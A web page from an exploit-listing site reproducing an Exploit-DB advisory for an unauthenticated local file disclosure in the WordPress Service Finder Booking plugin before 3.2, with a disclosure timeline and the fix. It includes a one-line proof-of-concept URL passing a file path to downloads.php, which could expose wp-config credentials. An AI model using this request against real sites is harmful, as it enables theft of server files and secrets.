Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure - exploit.company
header-logo
Suggest Exploit
vendor:
Service Finder Booking
by:
telahdihapus
7.5
CVSS
HIGH
Local File Disclosure
22
CWE
Product Name: Service Finder Booking
Affected Version From: < 3.2
Affected Version To: 3.2
Patch Exists: YES
Related CWE: N/A
CPE: //a:service_finder_booking
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure

Unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file.

Mitigation:

Update to version 3.2
Source

Exploit-DB raw data:

# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
# Google Dork: N/A
# Date: 09/01/2018 (GMT+7)
# Exploit Author: telahdihapus
# Vendor Homepage: https://themeforest.net/user/aonetheme
# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
# Tested on: windows 10

1. description :
unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file

2. POC :
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php

3. timeline
- jan 1, 2018 report vendor
- jan 1, 2018 vendor send email
- jan 1, 2018 send poc
- jan 2, 2018 vendor contact team
- jan 8, 2018 vendor send email about fixed issue

4. solution :
update to version 3.2

Navigation

Suggest Exploit

Services By CQR

cqrsecured